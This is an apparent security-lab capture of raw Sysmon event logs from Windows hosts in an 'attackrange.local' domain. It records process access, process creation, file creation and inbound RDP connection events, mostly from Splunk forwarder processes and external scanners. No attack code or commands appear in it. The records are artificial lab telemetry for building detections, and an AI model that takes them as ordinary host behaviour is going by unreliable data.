14:53:54.868{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049335Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:54.868{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049334Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:54.868{85C0FFC9-B7EC-607E-0500-00000000BB01}416532C:\Windows\system32\csrss.exe{85C0FFC9-EB02-607E-CD06-00000000BB01}1928C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000049333Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:54.868{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-EB02-607E-CD06-00000000BB01}1928C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000049332Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:54.869{85C0FFC9-EB02-607E-CD06-00000000BB01}1928C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000049331Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:54.306{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13EE82776511A1EE3B135AB26F9B2174,SHA256=B7DE6D06DEB6DEE43ABF04D984D42227BF9298465BD9AB95C51902648E62F765,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063490Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:55.909{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01E2516DB220F7B6D6CD78CC694BFDA3,SHA256=23AC91C7B4A05F4D3178B451610B54E4809090C00E81F6496F002CC0C29E65F5,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000063489Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:53.361{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-10193-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000063488Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:53.093{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57476-false10.0.1.12-8000- 23542300x800000000000000063487Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:55.144{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0C619C31CD5D42D6E3DDE06A04FFD2CD,SHA256=426DD807605F3F9679E922778913021FE189A35345292963C0A1CCAF24749485,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049361Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:53.345{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-57750-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 10341000x800000000000000049360Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:55.587{85C0FFC9-EB03-607E-CE06-00000000BB01}2848484C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000049359Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:55.571{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F1A0127283CF5934D4E249E1E8DC05FA,SHA256=52FA780AA8E3105300DBCF0AC3303085A1046725C33AA0F3A2815A6FC3DC5469,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000049358Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:55.478{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-EB03-607E-CE06-00000000BB01}2848C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049357Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:55.478{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049356Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:55.478{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049355Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:55.478{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049354Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:55.478{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049353Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:55.478{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049352Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:55.478{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049351Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:55.478{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049350Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:55.478{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049349Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:55.478{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049348Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:55.478{85C0FFC9-B7EC-607E-0500-00000000BB01}416532C:\Windows\system32\csrss.exe{85C0FFC9-EB03-607E-CE06-00000000BB01}2848C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000049347Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:55.478{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-EB03-607E-CE06-00000000BB01}2848C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000049346Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:55.479{85C0FFC9-EB03-607E-CE06-00000000BB01}2848C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000049345Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:55.321{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8CA5E7B36544F594F61E81F7F4671F5B,SHA256=8A052EA1A687DA1CDAEDF4C9FF8B06055EC70069E782A5957F4F31AFCEFEFCAC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063499Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:56.925{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55F9991AEB9216B460CF415A6802AAED,SHA256=8560DC3B13F08914114DF6EEF8192F4857EA2C378E966A96EB68143C459FD176,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000063498Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:55.749{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com62640-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000063497Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:55.211{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com62023-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000063496Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:54.910{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-3360-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000063495Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:54.703{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57478-false2.16.106.224a2-16-106-224.deploy.static.akamaitechnologies.com80http 354300x800000000000000063494Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:54.686{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-11558-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000063493Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:54.653{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local57477-true0:0:0:0:0:0:0:1win-dc-339.attackrange.local389ldap 354300x800000000000000063492Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:54.653{A7A01FEF-B636-607E-2600-00000000BB01}2192C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local57477-true0:0:0:0:0:0:0:1win-dc-339.attackrange.local389ldap 23542300x800000000000000063491Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:56.269{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4CF4B6D970685FA9D5DA60C53CD0554B,SHA256=8075957E900790B24D4C09765738E0E9A4D61DA4C1FB3B73AB0A11763E77055B,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049377Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:54.891{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-59223-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000049376Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:54.675{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com60274-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049375Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:56.759{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 